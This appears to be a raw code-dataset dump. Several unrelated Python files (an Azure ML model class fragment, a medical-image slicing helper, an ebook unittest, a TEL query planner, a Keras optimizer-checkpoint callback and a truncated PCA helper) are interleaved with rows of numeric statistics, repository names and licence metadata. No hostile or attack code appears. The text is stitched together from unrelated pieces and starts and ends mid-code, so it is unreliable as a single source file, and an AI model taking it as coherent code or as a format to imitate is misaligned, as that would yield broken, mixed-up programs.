    _validation = {
        'uri': {'required': True, 'pattern': r'[a-zA-Z0-9_]'},
        'job_input_type': {'required': True},
    }

    _attribute_map = {
        'mode': {'key': 'mode', 'type': 'str'},
        'uri': {'key': 'uri', 'type': 'str'},
        'description': {'key': 'description', 'type': 'str'},
        'job_input_type': {'key': 'jobInputType', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        """
        :keyword mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
         "ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
        :paramtype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
        :keyword uri: Required. Input Asset URI.
        :paramtype uri: str
        :keyword description: Description for the input.
        :paramtype description: str
        """
        super(UriFolderJobInput, self).__init__(**kwargs)
        self.mode = kwargs.get('mode', None)
        # 'uri' is required; a missing key raises KeyError by design.
        self.uri = kwargs['uri']
        self.description = kwargs.get('description', None)
        # Fix: the generated code assigned the discriminator twice; set it once.
        self.job_input_type = 'UriFolder'  # type: str
| 39.48853
| 146
| 0.650652
| 5,078
| 46,478
| 5.820008
| 0.081134
| 0.02487
| 0.058469
| 0.069432
| 0.696725
| 0.667355
| 0.636327
| 0.589734
| 0.54754
| 0.517392
| 0
| 0.001085
| 0.226279
| 46,478
| 1,176
| 147
| 39.522109
| 0.82075
| 0.539739
| 0
| 0.538947
| 0
| 0
| 0.250841
| 0.013673
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0.004211
| 0
| 0.206316
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a3256f1d5ce64484739511b64bf4572f8dcbb09c
| 407
|
py
|
Python
|
utils.py
|
AbinavRavi/Federated-learning-MI
|
06294e5de94bf5b8826dedb469a3430fdae76e37
|
[
"MIT"
] | 3
|
2021-04-04T19:32:29.000Z
|
2022-02-10T05:25:27.000Z
|
utils.py
|
AbinavRavi/Federated-learning-MI
|
06294e5de94bf5b8826dedb469a3430fdae76e37
|
[
"MIT"
] | null | null | null |
utils.py
|
AbinavRavi/Federated-learning-MI
|
06294e5de94bf5b8826dedb469a3430fdae76e37
|
[
"MIT"
] | null | null | null |
import nibabel as nib
import numpy as np
from glob import glob
def to_slice(image_path, seg_path):
    """Load a NIfTI image/segmentation pair and keep its non-empty 2D slices.

    args:
        image_path: path to the NIfTI image volume.
        seg_path: path to the matching NIfTI segmentation volume.
    returns:
        (image_list, seg_list): parallel lists of 2D slices taken along the
        third axis, keeping only slices where the image has a non-zero voxel.
    """
    image = nib.load(image_path).get_fdata()
    seg = nib.load(seg_path).get_fdata()
    # assumes image and seg are 3D volumes with matching shape — TODO confirm
    image_list = []
    seg_list = []
    for i in range(image.shape[2]):
        # BUG FIX: the loop runs over axis 2 but the original indexed axis 0
        # (`image[i]`); slice along the axis actually being iterated.
        img_slice = image[:, :, i]
        # BUG FIX: `np.nonzero(...) != 0` compared a tuple with 0 and was
        # always True, so empty slices were never filtered out.
        if np.count_nonzero(img_slice) != 0:
            image_list.append(img_slice)
            seg_list.append(seg[:, :, i])
    return image_list, seg_list
| 22.611111
| 44
| 0.638821
| 65
| 407
| 3.8
| 0.446154
| 0.109312
| 0.097166
| 0.129555
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006431
| 0.235872
| 407
| 17
| 45
| 23.941176
| 0.787781
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.230769
| 0
| 0.384615
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a3259ed1f24efeaecf755551060f140ed167c93c
| 576
|
py
|
Python
|
tests/test_ebook.py
|
plysytsya/doublebook
|
09dcd5399288c9544df928136a9e2f2e54639cbd
|
[
"MIT"
] | null | null | null |
tests/test_ebook.py
|
plysytsya/doublebook
|
09dcd5399288c9544df928136a9e2f2e54639cbd
|
[
"MIT"
] | null | null | null |
tests/test_ebook.py
|
plysytsya/doublebook
|
09dcd5399288c9544df928136a9e2f2e54639cbd
|
[
"MIT"
] | null | null | null |
import os
import unittest
from doublebook.ebook import Ebook
THIS_DIR = os.path.dirname(os.path.abspath(__file__))
class EbookTest(unittest.TestCase):
    """Unit tests for the Ebook reader."""

    def setUp(self):
        # Fresh Ebook instance per test, pointed at the bundled sample text.
        sample_path = os.path.join(THIS_DIR, "test_data", "zen_en.txt")
        self.ebook = Ebook(sample_path)

    def test_read(self):
        """read() should populate `content` with the raw text as a string."""
        self.ebook.read()
        self.assertIsInstance(self.ebook.content, str)

    def test_tokenize(self):
        """tokenize() should split the text into a list of sentences."""
        self.ebook.tokenize()
        self.assertIsInstance(self.ebook.sentences, list)
# Allow running this test module directly: `python tests/test_ebook.py`.
if __name__ == '__main__':
    unittest.main(verbosity=3)
| 22.153846
| 72
| 0.689236
| 77
| 576
| 4.87013
| 0.493506
| 0.12
| 0.053333
| 0.154667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002151
| 0.192708
| 576
| 25
| 73
| 23.04
| 0.804301
| 0
| 0
| 0
| 0
| 0
| 0.046875
| 0
| 0
| 0
| 0
| 0
| 0.125
| 1
| 0.1875
| false
| 0
| 0.1875
| 0
| 0.4375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a32ad9de709c3a24f830152b0d7a35e9a5113527
| 10,061
|
py
|
Python
|
src/panoramic/cli/husky/service/blending/tel_planner.py
|
kubamahnert/panoramic-cli
|
036f45a05d39f5762088ce23dbe367b938192f79
|
[
"MIT"
] | 5
|
2020-11-13T17:26:59.000Z
|
2021-03-19T15:11:26.000Z
|
src/panoramic/cli/husky/service/blending/tel_planner.py
|
kubamahnert/panoramic-cli
|
036f45a05d39f5762088ce23dbe367b938192f79
|
[
"MIT"
] | 5
|
2020-10-28T10:22:35.000Z
|
2021-01-27T17:33:58.000Z
|
src/panoramic/cli/husky/service/blending/tel_planner.py
|
kubamahnert/panoramic-cli
|
036f45a05d39f5762088ce23dbe367b938192f79
|
[
"MIT"
] | 3
|
2021-01-26T07:58:03.000Z
|
2021-03-11T13:28:34.000Z
|
from collections import defaultdict
from typing import Dict, Iterable, List, Optional, Set, Tuple, cast
from sqlalchemy import column
from panoramic.cli.husky.common.enum import EnumHelper
from panoramic.cli.husky.core.taxonomy.aggregations import AggregationDefinition
from panoramic.cli.husky.core.taxonomy.enums import AggregationType, TaxonTypeEnum
from panoramic.cli.husky.core.taxonomy.models import Taxon
from panoramic.cli.husky.core.taxonomy.override_mapping.types import (
OverrideMappingTelData,
)
from panoramic.cli.husky.core.tel.exceptions import TelExpressionException
from panoramic.cli.husky.core.tel.result import PostFormula, PreFormula, TaxonToTemplate
from panoramic.cli.husky.core.tel.sql_formula import SqlFormulaTemplate, SqlTemplate
from panoramic.cli.husky.core.tel.tel_dialect import TaxonTelDialect
from panoramic.cli.husky.service.context import HuskyQueryContext
from panoramic.cli.husky.service.filter_builder.filter_clauses import FilterClause
from panoramic.cli.husky.service.types.api_data_request_types import BlendingDataRequest
from panoramic.cli.husky.service.utils.exceptions import (
HuskyInvalidTelException,
InvalidRequest,
)
from panoramic.cli.husky.service.utils.taxon_slug_expression import (
TaxonExpressionStr,
TaxonMap,
)
class TelPlan:
    """Result container for TEL planning of a blended data request.

    Collects the SQL formula templates, dimension/metric formulas, comparison
    join information and override-mapping metadata produced by TelPlanner.
    """

    # Formula templates keyed by data source name.
    data_source_formula_templates: Dict[str, List[SqlFormulaTemplate]]
    comparison_data_source_formula_templates: Dict[str, List[SqlFormulaTemplate]]
    dimension_formulas: List[PreFormula]
    comparison_dimension_formulas: List[PreFormula]
    metric_pre: List[PreFormula]
    # SQL formulas and taxons for the last phase.
    metric_post: List[Tuple[PostFormula, Taxon]]
    # Filter templates keyed by data source, then by taxon slug.
    data_source_filter_templates: Dict[str, TaxonToTemplate]
    # Columns used to join the data and comparison dataframes.
    comparison_join_columns: List[str]
    # Raw taxon slugs to use for comparison.
    comparison_raw_taxon_slugs: List[TaxonExpressionStr]
    # Override mappings referenced in the result.
    override_mappings: OverrideMappingTelData
    # Override mappings referenced in the result of the comparison query.
    comparison_override_mappings: OverrideMappingTelData

    def __init__(self):
        # Default-constructed containers so callers can append/assign
        # without key-existence checks.
        self.data_source_formula_templates = defaultdict(list)
        self.comparison_data_source_formula_templates = defaultdict(list)
        self.data_source_filter_templates = defaultdict(dict)
        self.comparison_join_columns = []
        self.comparison_raw_taxon_slugs = []
        self.dimension_formulas = []
        self.comparison_dimension_formulas = []
        self.metric_pre = []
        self.metric_post = []
        self.override_mappings = set()
        self.comparison_override_mappings = set()
class TelPlanner:
    """Builds a TelPlan for a blending data request.

    Walks the projection taxons (and comparison taxons, when present),
    parses any TEL calculations, and collects the resulting formula
    templates and pre/post formulas into a TelPlan.
    """

    @classmethod
    def plan(
        cls,
        ctx: HuskyQueryContext,
        request: BlendingDataRequest,
        projection_taxons: TaxonMap,
        all_taxons: TaxonMap,
        taxon_to_ds: Dict[str, Set[str]],
    ) -> TelPlan:
        """
        Prepares taxons plan
        """
        plan = TelPlan()
        # NOTE(review): result_cache is populated below but never read in this
        # method — confirm whether it can be removed.
        result_cache = dict()
        all_data_sources = {subreq.properties.data_source for subreq in request.data_subrequests}
        for taxon in projection_taxons.values():
            if taxon.calculation:
                # Computed taxon: parse its TEL expression against the data
                # sources of the original (non-comparison) slug.
                original_slug = taxon.comparison_taxon_slug_origin or taxon.slug
                taxon_data_sources = taxon_to_ds[original_slug]
                result = cls._parse_taxon_expr(ctx, taxon, taxon.slug, taxon_data_sources, all_taxons)
                result_cache[taxon.slug] = result
                # Create dict for dim templates, key is data source
                for ds_formula in result.data_source_formula_templates:
                    plan.data_source_formula_templates[ds_formula.data_source].append(ds_formula)
                plan.dimension_formulas.extend(result.dimension_formulas)
                plan.metric_pre.extend(result.pre_formulas)
                plan.metric_post.append((result.post_formula, taxon))
                plan.override_mappings.update(result.override_mappings)
            else:
                # Raw taxon: select its safe SQL identifier directly and pick
                # the aggregation (group_by for dimensions, sum for metrics)
                # unless the taxon carries its own aggregation definition.
                sql_slug = column(taxon.slug_safe_sql_identifier)
                if taxon.is_dimension:
                    aggregation = taxon.aggregation or AggregationDefinition(type=AggregationType.group_by)
                else:
                    aggregation = taxon.aggregation or AggregationDefinition(type=AggregationType.sum)
                plan.metric_pre.append(PreFormula(sql_slug, taxon.slug, aggregation))
                plan.metric_post.append((PostFormula(sql_slug), taxon))
        if request.comparison and request.comparison.taxons:
            for taxon in [all_taxons[slug] for slug in request.comparison.taxons]:
                if taxon.calculation:
                    # Comparison join columns get a 'comp_join_col_' slug prefix
                    # and are parsed against all data sources in the request.
                    taxon_data_sources = all_data_sources
                    result = cls._parse_taxon_expr(
                        ctx, taxon, 'comp_join_col_' + taxon.slug, taxon_data_sources, all_taxons
                    )
                    # Create dict for dim templates, key is data source
                    # NOTE(review): the templates are appended to BOTH the main
                    # and the comparison template maps below — confirm this
                    # double registration is intentional.
                    for ds_formula in result.data_source_formula_templates:
                        plan.data_source_formula_templates[ds_formula.data_source].append(ds_formula)
                    if result.override_mappings:
                        plan.override_mappings.update(result.override_mappings)
                        plan.comparison_override_mappings.update(result.override_mappings)
                    plan.dimension_formulas.extend(result.dimension_formulas)
                    for ds_formula in result.data_source_formula_templates:
                        plan.comparison_data_source_formula_templates[ds_formula.data_source].append(ds_formula)
                    plan.comparison_dimension_formulas.extend(result.dimension_formulas)
                    for dim_formula in result.dimension_formulas:
                        plan.comparison_join_columns.append(dim_formula.label)
                else:
                    # Raw comparison join taxon.. add it to join and also to select from dataframes
                    plan.comparison_join_columns.append(taxon.slug_safe_sql_identifier)
                    plan.comparison_raw_taxon_slugs.append(taxon.slug_safe_sql_identifier)
        cls._populate_filter_templates_to_plan(ctx, plan, request, all_taxons)
        return plan

    @classmethod
    def _populate_filter_templates_to_plan(
        cls, ctx: HuskyQueryContext, plan: TelPlan, request: BlendingDataRequest, all_taxons: TaxonMap
    ):
        """
        Prepare sql templates for filters, keyed by data source and then by taxon slug.
        In general, TelPlan filtering works like this:
        1. create template for each subrequest filter taxon (raw and computed)
        2. pass that template as dict to the single husky
        3. In select builder, render these templates to create records into taxon_model_info_map,
           especially the sql accessor property.
        :param ctx: Husky query context forwarded to template creation.
        """
        for subrequest in request.data_subrequests:
            data_source = subrequest.properties.data_source
            # Both the subrequest-level and scope-level preaggregation filters
            # contribute taxon templates for this data source.
            filter_templates = cls.get_preaggregation_filter_templates(
                ctx,
                [subrequest.preaggregation_filters, subrequest.scope.preaggregation_filters],
                all_taxons,
                data_source,
            )
            plan.data_source_filter_templates[data_source] = filter_templates

    @classmethod
    def get_preaggregation_filter_templates(
        cls,
        ctx: HuskyQueryContext,
        filter_clauses: List[Optional[FilterClause]],
        all_taxons: TaxonMap,
        data_source: str,
    ) -> TaxonToTemplate:
        """
        Creates sql templates for each taxon. Returns them keyed by taxon slug.

        Raises HuskyInvalidTelException (via _parse_taxon_expr) on invalid TEL,
        and InvalidRequest when a metric taxon appears in a preaggregation filter.
        """
        taxons_to_template: TaxonToTemplate = dict()
        for filter_clause in filter_clauses:
            if filter_clause:
                taxon_slugs = filter_clause.get_taxon_slugs()
                for slug in taxon_slugs:
                    taxon = all_taxons[cast(TaxonExpressionStr, slug)]
                    if not taxon.is_dimension:
                        # Preaggregation filters may only reference dimensions.
                        exc = InvalidRequest(
                            'request.preaggregation_filters',
                            f'Metric taxons are not allowed in preaggregation filters. Remove filter for taxon {taxon.slug}',
                        )
                        raise exc
                    if taxon.calculation:
                        # Computed taxon: render its TEL expression into a
                        # single-data-source template (subrequest_only=True).
                        result = cls._parse_taxon_expr(
                            ctx, taxon, taxon.slug, [data_source], all_taxons, subrequest_only=True
                        )
                        taxons_to_template[taxon.slug_expr] = result.data_source_formula_templates[0]
                    else:
                        # Raw taxon: a trivial '${slug}' placeholder template.
                        taxons_to_template[taxon.slug_expr] = SqlFormulaTemplate(
                            SqlTemplate(f'${{{taxon.slug}}}'), taxon.slug_expr, data_source, {taxon.slug_expr}
                        )
        return taxons_to_template

    @staticmethod
    def _parse_taxon_expr(
        ctx: HuskyQueryContext,
        taxon: Taxon,
        tel_prefix: str,
        data_sources: Iterable[str],
        all_taxons: TaxonMap,
        subrequest_only=False,
    ):
        """Render a taxon's TEL calculation, wrapping TEL errors.

        Raises HuskyInvalidTelException (chained from TelExpressionException)
        when the expression cannot be rendered.
        """
        taxon_type = EnumHelper.from_value(TaxonTypeEnum, taxon.taxon_type)
        try:
            return TaxonTelDialect().render(
                expr=cast(str, taxon.calculation),
                ctx=ctx,
                taxon_map=all_taxons,
                taxon_slug=tel_prefix,
                comparison=taxon.is_comparison_taxon,
                data_sources=data_sources,
                taxon_type=taxon_type,
                aggregation=taxon.aggregation,
                subrequest_only=subrequest_only,
            )
        except TelExpressionException as error:
            raise HuskyInvalidTelException(error, taxon.slug)
| 43.743478
| 125
| 0.657191
| 1,068
| 10,061
| 5.940075
| 0.185393
| 0.044136
| 0.035309
| 0.046343
| 0.337327
| 0.288304
| 0.220208
| 0.124527
| 0.107188
| 0.094578
| 0
| 0.00055
| 0.27701
| 10,061
| 229
| 126
| 43.934498
| 0.871597
| 0.066196
| 0
| 0.180233
| 0
| 0
| 0.01727
| 0.003364
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02907
| false
| 0
| 0.098837
| 0
| 0.22093
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a32bb9ecf389628aa17fb222486d5eb8bc144dcb
| 13,836
|
py
|
Python
|
mrcnn/callbacks.py
|
dtitenko-dev/Mask_RCNN
|
5167db4174d96e9f2accc0a9f4866fb3a7bf5993
|
[
"MIT"
] | null | null | null |
mrcnn/callbacks.py
|
dtitenko-dev/Mask_RCNN
|
5167db4174d96e9f2accc0a9f4866fb3a7bf5993
|
[
"MIT"
] | null | null | null |
mrcnn/callbacks.py
|
dtitenko-dev/Mask_RCNN
|
5167db4174d96e9f2accc0a9f4866fb3a7bf5993
|
[
"MIT"
] | null | null | null |
import os
import re
import six
import h5py
import json
import logging
import tensorflow.keras as keras
from tensorflow.python.keras import optimizers
from tensorflow.python.keras.saving import hdf5_format
from tensorflow.python.keras.utils import tf_utils
from tensorflow.python.keras.saving import saving_utils
from tensorflow.python.keras.utils.io_utils import path_to_string
from tensorflow.python.distribute import distributed_file_utils
from tensorflow.python.lib.io import file_io
from tensorflow.python.training import checkpoint_management
from tensorflow.python.util import serialization
def save_optimizer_weights(model, filepath, overwrite=True, **kwargs):
    """Saves a compiled model's optimizer state (and metadata) to an hdf5 file.

    Arguments:
        model: Compiled model whose optimizer state should be saved.
        filepath: Destination path, or an already-open ``h5py.File``.
        overwrite: When False and the file exists, ask before overwriting.
        **kwargs: Unused; accepted for call-site compatibility.
    """
    if not isinstance(filepath, h5py.File):
        # If file exists and should not be overwritten.
        if not overwrite and os.path.isfile(filepath):
            proceed = hdf5_format.ask_to_proceed_with_overwrite(filepath)
            if not proceed:
                return
        f = h5py.File(filepath, mode='w')
        opened_new_file = True
    else:
        # Caller passed an open file handle; do not close it on exit.
        f = filepath
        opened_new_file = False
    try:
        # Store model/optimizer metadata as hdf5 attributes; containers are
        # JSON-encoded since hdf5 attrs only hold scalars/strings.
        model_metadata = saving_utils.model_metadata(
            model, include_optimizer=True, require_config=False)
        for k, v in model_metadata.items():
            if isinstance(v, (dict, list, tuple)):
                f.attrs[k] = json.dumps(
                    v, default=serialization.get_json_type).encode('utf8')
            else:
                f.attrs[k] = v
        # TFOptimizer (v1 wrapper) weights are not saved by this helper.
        if not isinstance(model.optimizer, optimizers.TFOptimizer):
            hdf5_format.save_optimizer_weights_to_hdf5_group(f, model.optimizer)
        f.flush()
    finally:
        # Only close the file if this function opened it.
        if opened_new_file:
            f.close()
def load_optimizer_weights(model, filepath):
    """Loads optimizer weights to compiled model from hdf5 file.

    Arguments:
        model: Compiled model whose optimizer state should be restored.
        filepath: Path to an hdf5 file (or an open ``h5py.File``) produced by
            ``save_optimizer_weights``.

    Returns:
        The same ``model``; its optimizer weights are restored when possible,
        otherwise a warning is logged and the optimizer stays freshly
        initialized.
    """
    opened_new_file = not isinstance(filepath, h5py.File)
    if opened_new_file:
        f = h5py.File(filepath, mode='r')
    else:
        # Caller passed an open file handle; do not close it on exit.
        f = filepath
    try:
        if model.optimizer and 'optimizer_weights' in f:
            try:
                # Optimizer slot variables are created lazily; force creation
                # so the saved values have somewhere to be restored into.
                model.optimizer._create_all_weights(model.trainable_variables)
            except (NotImplementedError, AttributeError):
                # BUG FIX: the original message contained an unfilled '{}'
                # placeholder; use lazy %-style logging with the optimizer.
                logging.warning(
                    'Error when creating the weights of optimizer %s, making it '
                    'impossible to restore the saved optimizer state. As a result, '
                    'your model is starting with a freshly initialized optimizer.',
                    model.optimizer)
            optimizer_weight_values = hdf5_format.load_optimizer_weights_from_hdf5_group(f)
            try:
                model.optimizer.set_weights(optimizer_weight_values)
            except ValueError:
                logging.warning('Error in loading the saved optimizer '
                                'state. As a result, your model is '
                                'starting with a freshly initialized '
                                'optimizer.')
    finally:
        # Only close the file if this function opened it.
        if opened_new_file:
            f.close()
    return model
class OptimizerCheckpoint(keras.callbacks.Callback):
    """Keras callback that checkpoints ONLY the optimizer state to hdf5.

    Mirrors the save-frequency / filepath-pattern behavior of
    ``keras.callbacks.ModelCheckpoint`` (adapted from TF-internal code),
    but delegates the actual I/O to ``save_optimizer_weights`` /
    ``load_optimizer_weights``.
    """

    def __init__(self,
                 filepath,
                 verbose=0,
                 save_freq='epoch',
                 **kwargs):
        """
        Arguments:
            filepath: Destination path; may contain formatting placeholders
                such as ``{epoch:02d}`` filled from the logs dict.
            verbose: When > 0, print a message on each save.
            save_freq: ``'epoch'`` to save at epoch end, or an int number of
                batches between saves.
            **kwargs: Supports the deprecated ``load_weights_on_restart`` and
                ``period`` arguments.
        """
        super(OptimizerCheckpoint, self).__init__()
        self.verbose = verbose
        self.filepath = path_to_string(filepath)
        self.save_freq = save_freq
        # Counters backing the 'epoch'/batch-count save-frequency logic.
        self.epochs_since_last_save = 0
        self._batches_seen_since_last_saving = 0
        self._last_batch_seen = 0
        self._current_epoch = 0
        if 'load_weights_on_restart' in kwargs:
            self.load_weights_on_restart = kwargs['load_weights_on_restart']
            logging.warning('`load_weights_on_restart` argument is deprecated. '
                            'Please use `model.load_weights()` for loading weights '
                            'before the start of `model.fit()`.')
        else:
            self.load_weights_on_restart = False
        if 'period' in kwargs:
            self.period = kwargs['period']
            logging.warning('`period` argument is deprecated. Please use `save_freq` '
                            'to specify the frequency in number of batches seen.')
        else:
            self.period = 1
        if self.save_freq != 'epoch' and not isinstance(self.save_freq, int):
            raise ValueError('Unrecognized save_freq: {}'.format(self.save_freq))
        # Only the chief worker writes model checkpoints, but all workers
        # restore checkpoint at on_train_begin().
        self._chief_worker_only = False

    def on_train_begin(self, logs=None):
        # Optionally restore optimizer state from the most recent checkpoint.
        if self.load_weights_on_restart:
            filepath_to_load = (
                self._get_most_recently_modified_file_matching_pattern(self.filepath))
            if (filepath_to_load is not None and
                    self._checkpoint_exists(filepath_to_load)):
                try:
                    # `filepath` may contain placeholders such as `{epoch:02d}`, and
                    # thus it attempts to load the most recently modified file with file
                    # name matching the pattern.
                    load_optimizer_weights(self.model, filepath=filepath_to_load)
                except (IOError, ValueError) as e:
                    raise ValueError('Error loading file from {}. Reason: {}'.format(
                        filepath_to_load, e))

    def on_train_batch_end(self, batch, logs=None):
        # Batch-frequency saving (only active when save_freq is an int).
        if self._should_save_on_batch(batch):
            self._save_optimizer_weights(epoch=self._current_epoch, logs=logs)

    def on_epoch_begin(self, epoch, logs=None):
        # Track the epoch so batch-end saves can format the filepath.
        self._current_epoch = epoch

    def on_epoch_end(self, epoch, logs=None):
        self.epochs_since_last_save += 1
        if self.save_freq == 'epoch':
            self._save_optimizer_weights(epoch, logs)

    def _should_save_on_batch(self, batch):
        """Handles batch-level saving logic, supports steps_per_execution."""
        if self.save_freq == 'epoch':
            return False
        if batch <= self._last_batch_seen:  # New epoch.
            add_batches = batch + 1  # batches are zero-indexed.
        else:
            add_batches = batch - self._last_batch_seen
        self._batches_seen_since_last_saving += add_batches
        self._last_batch_seen = batch
        if self._batches_seen_since_last_saving >= self.save_freq:
            self._batches_seen_since_last_saving = 0
            return True
        return False

    def _save_optimizer_weights(self, epoch, logs=None):
        """Saves the optimizer weights.

        Arguments:
            epoch: the epoch this iteration is in.
            logs: the `logs` dict passed in to `on_batch_end` or `on_epoch_end`.
        """
        logs = logs or {}
        if isinstance(self.save_freq, int) or self.epochs_since_last_save >= self.period:
            # Block only when saving interval is reached.
            logs = tf_utils.to_numpy_or_python_type(logs)
            self.epochs_since_last_save = 0
            filepath = self._get_file_path(epoch, logs)
            try:
                if self.verbose > 0:
                    print('\nEpoch %05d: saving model to %s' % (epoch + 1, filepath))
                save_optimizer_weights(self.model, filepath, overwrite=True)
            except IOError as e:
                # `e.errno` appears to be `None` so checking the content of `e.args[0]`.
                if 'is a directory' in six.ensure_str(e.args[0]).lower():
                    raise IOError('Please specify a non-directory filepath for '
                                  'ModelCheckpoint. Filepath used is an existing '
                                  'directory: {}'.format(filepath))

    def _get_file_path(self, epoch, logs):
        """Returns the file path for checkpoint."""
        # pylint: disable=protected-access
        try:
            # `filepath` may contain placeholders such as `{epoch:02d}` and
            # `{mape:.2f}`. A mismatch between logged metrics and the path's
            # placeholders can cause formatting to fail.
            file_path = self.filepath.format(epoch=epoch + 1, **logs)
        except KeyError as e:
            raise KeyError('Failed to format this callback filepath: "{}". '
                           'Reason: {}'.format(self.filepath, e))
        self._write_filepath = distributed_file_utils.write_filepath(
            file_path, self.model.distribute_strategy)
        return self._write_filepath

    def _maybe_remove_file(self):
        # Remove the checkpoint directory in multi-worker training where this worker
        # should not checkpoint. It is a dummy directory previously saved for sync
        # distributed training.
        distributed_file_utils.remove_temp_dir_with_filepath(
            self._write_filepath, self.model.distribute_strategy)

    def _checkpoint_exists(self, filepath):
        """Returns whether the checkpoint `filepath` refers to exists."""
        if filepath.endswith('.h5'):
            return file_io.file_exists(filepath)
        tf_saved_optimizer_exists = file_io.file_exists(filepath + '.h5')
        return tf_saved_optimizer_exists

    def _get_most_recently_modified_file_matching_pattern(self, pattern):
        """Returns the most recently modified filepath matching pattern.

        Pattern may contain python formatting placeholder. If
        `tf.train.latest_checkpoint()` does not return None, use that; otherwise,
        check for most recently modified one that matches the pattern.

        In the rare case where there are more than one pattern-matching file having
        the same modified time that is most recent among all, return the filepath
        that is largest (by `>` operator, lexicographically using the numeric
        equivalents). This provides a tie-breaker when multiple files are most
        recent. Note that a larger `filepath` can sometimes indicate a later time of
        modification (for instance, when epoch/batch is used as formatting option),
        but not necessarily (when accuracy or loss is used). The tie-breaker is
        put in the logic as best effort to return the most recent, and to avoid
        undeterministic result.

        Modified time of a file is obtained with `os.path.getmtime()`.

        Arguments:
            pattern: The file pattern that may optionally contain python placeholder
                such as `{epoch:02d}`.

        Returns:
            The most recently modified file's full filepath matching `pattern`. If
            `pattern` does not contain any placeholder, this returns the filepath
            that exactly matches `pattern`. Returns `None` if no match is found.
        """
        dir_name = os.path.dirname(pattern)
        base_name = os.path.basename(pattern)
        # Turn the format placeholders into a wildcard regex for file matching.
        base_name_regex = '^' + re.sub(r'{.*}', r'.*', base_name) + '$'
        # If tf.train.latest_checkpoint tells us there exists a latest checkpoint,
        # use that as it is more robust than `os.path.getmtime()`.
        latest_tf_checkpoint = checkpoint_management.latest_checkpoint(dir_name)
        if latest_tf_checkpoint is not None and re.match(
                base_name_regex, os.path.basename(latest_tf_checkpoint)):
            return latest_tf_checkpoint
        latest_mod_time = 0
        file_path_with_latest_mod_time = None
        n_file_with_latest_mod_time = 0
        file_path_with_largest_file_name = None
        if file_io.file_exists(dir_name):
            for file_name in os.listdir(dir_name):
                # Only consider if `file_name` matches the pattern.
                if re.match(base_name_regex, file_name):
                    file_path = os.path.join(dir_name, file_name)
                    mod_time = os.path.getmtime(file_path)
                    if (file_path_with_largest_file_name is None or
                            file_path > file_path_with_largest_file_name):
                        file_path_with_largest_file_name = file_path
                    if mod_time > latest_mod_time:
                        latest_mod_time = mod_time
                        file_path_with_latest_mod_time = file_path
                        # In the case a file with later modified time is found, reset
                        # the counter for the number of files with latest modified time.
                        n_file_with_latest_mod_time = 1
                    elif mod_time == latest_mod_time:
                        # In the case a file has modified time tied with the most recent,
                        # increment the counter for the number of files with latest modified
                        # time by 1.
                        n_file_with_latest_mod_time += 1
        if n_file_with_latest_mod_time == 1:
            # Return the sole file that has most recent modified time.
            return file_path_with_latest_mod_time
        else:
            # If there are more than one file having latest modified time, return
            # the file path with the largest file name.
            return file_path_with_largest_file_name
| 44.632258
| 92
| 0.626337
| 1,702
| 13,836
| 4.857814
| 0.202115
| 0.019352
| 0.017296
| 0.014393
| 0.269231
| 0.153362
| 0.09688
| 0.062893
| 0.044267
| 0.044267
| 0
| 0.006838
| 0.3024
| 13,836
| 309
| 93
| 44.776699
| 0.849772
| 0.265901
| 0
| 0.159794
| 0
| 0
| 0.095209
| 0.009541
| 0
| 0
| 0
| 0
| 0
| 1
| 0.06701
| false
| 0
| 0.082474
| 0
| 0.21134
| 0.005155
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a32d410f0fad03a9c0fdccb975ef58812fe45a3f
| 4,576
|
py
|
Python
|
pca.py
|
vgp314/Udacity-Arvato-Identify-Customer-Segments
|
6be1d4f1eeac391c17c70fdf584bdc4813f80fd8
|
[
"ADSL"
] | 1
|
2020-05-21T23:56:57.000Z
|
2020-05-21T23:56:57.000Z
|
pca.py
|
vgp314/Udacity-Arvato-Identify-Customer-Segments
|
6be1d4f1eeac391c17c70fdf584bdc4813f80fd8
|
[
"ADSL"
] | null | null | null |
pca.py
|
vgp314/Udacity-Arvato-Identify-Customer-Segments
|
6be1d4f1eeac391c17c70fdf584bdc4813f80fd8
|
[
"ADSL"
] | null | null | null |
#pca model n componentes
from sklearn.decomposition import PCA
import numpy as np
from pylab import rcParams
import matplotlib.pyplot as plt
import pandas as pd
def pca_model_n_components(df, n_components):
    """Fit a PCA limited to a fixed number of components.

    args:
        df: dataframe to decompose.
        n_components: number of principal components to keep.
    returns:
        (pca, transformed): the fitted PCA model and the transformed data.
    """
    model = PCA(n_components)
